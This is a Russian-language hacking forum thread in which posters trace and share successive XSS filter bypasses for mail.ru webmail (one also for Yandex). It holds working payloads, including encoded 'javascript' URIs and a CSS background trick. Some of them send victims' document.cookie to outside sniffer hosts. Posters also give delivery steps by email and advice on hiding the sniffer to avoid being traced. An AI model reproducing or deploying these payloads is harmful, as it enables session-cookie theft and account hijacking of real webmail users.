Заранее прошу прощения у модераторов за дублирование темы, просто на мой взгляд в этом разделе следует выкладывать _готовые_ уязвимости, а не задавать вопросы по их поиску. Антология XSS на mail.ru Не знаю, может кому пригодится, но эволюция фильтра на mail.ru протекала следующим образом. На момент моей регистрации на античате перестала действовать фишка. PHP: <image src=JaVaScRiPt:alert()> Все были очень удивлены Эта бага держалась очень долго... Следущая ошибка была найдена мной, помог мне Майор, она работала под IE, а я тестил под Оперой) Майор проверил под IE, я ему сперва даже не поверил) Брался fail.txt, в нем в наглую прописывалось: PHP: <script>alert()</script> и всё это дело переименовывалось в fail.jpg. Но эту филонку сравнительно быстро прекрыли... Следующим шагом стал пост уже не помню кого... =) Если напомните, то будет хорошо) XSS проходила благодаря двойному кодированию в ASCII слова javascript. При этом этаже бага была одновременно актуальна и для yandex.ru =) Выглядело это так: PHP: <img src="http://server.com/picture.jpg" dynsrc="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:document.images[0].src='http://sniffer.com/sniff.php?cook='+document.cookie"> К сожалению, всё что ушло в большой паблик долго не живет =) И тут снова Майор, умнейший человек) Я долго ругался когда он мне одному из первых поведал о собственном открытии) Всё было просто и изящно... Чтобы закрыть предыдущую багу, фильтр на Mail.ru стал до бесконечности раскодировать то что закодировано в ASCII... Тогда Майор половину слова javascript закодировал в ASCII и отдельно ещё раз зашифровал каждый символ &. А другую половину поставил через знак табуляции... И фильтр терялся... Выглядело это так: PHP: <bgsound src="&#106&#97&#118&#97&#115&#99&#114 ipt:alert()" loop=5> Но и эта уязвимость будучи выложенной долго не продержалась. И вот эта тема коснулась меня) Всю ночь убил на поиски, эксперименты... Мозги уже не варят. XSS выглядит следующим образом: PHP: <font color="green>"style="font-size:1px;background:url\(java/**/script:alert('XSS by Dronga'))"> Вот) Активная, в теле письма... Конечно она ещё сыровата, но общая конструкция видна. В таком виде работает вроде только под ИЕ, сколько не пытался под оперу заточить - бесполезно... Кто будет пробовать - советую поиграть с символами " и `. Что-то типа вот так: color=`green"style Конечно, может кто-то что-то и покруче нашел, что для всех браузеров применимо, но что я нашел тем и поделился. PS. Не забываем о приватности раздела и доверии друг другу.
Странно, у меня не работает, последние скобки заменяются на подмигивающий смайл. Добавлено: Точно про разметку забыл, гост спасибо
Ребята, всё работает, заходим в раздел E-mail->FAQ, скачиваем програмку XSSTester от LittleLamer, удаляем всё что там забито по дефолту и вставляем мой вариант, ничего не дописываем (никаких <html></html> не надо, их фильтр нещадно режет, вставляем одну единственную строчку - саму XSS). Забиваем информацию для отправки и отправляем. Идем проверяем, ещё раз напоминаю что актуально в таком виде только для IE (у меня IE6 SP2).
Кто-нибудь сформировал запрос, уже со сниффером, просто у меня не получается правильную структуру сделать.
Dronga респект!!! Держи: PHP: <font color="green>"style="font-size:1px;background:url\(java/**/script:document.images[0].src='http://privatesniff/s.jpg?'+document.cookie)">
Я ващет прячу под кодировкой свой снифф. Чего и всем советую. Меня так один раз вычислили когда указал свой снифф. Пантер, стуканись плз в аську, дело есть.
Нет не такая воще её просек морф просто в гипер ссылки java скрипты воще не фильтруются втавляешь туда простой запрос чтобы куки пиздит и всё. Прошу добавить мне репутации =))
Что то я тебя не понял не много! Ты имеешь ввиду активная или пассивная. Активная там. Вообщем посмотри лучше видео.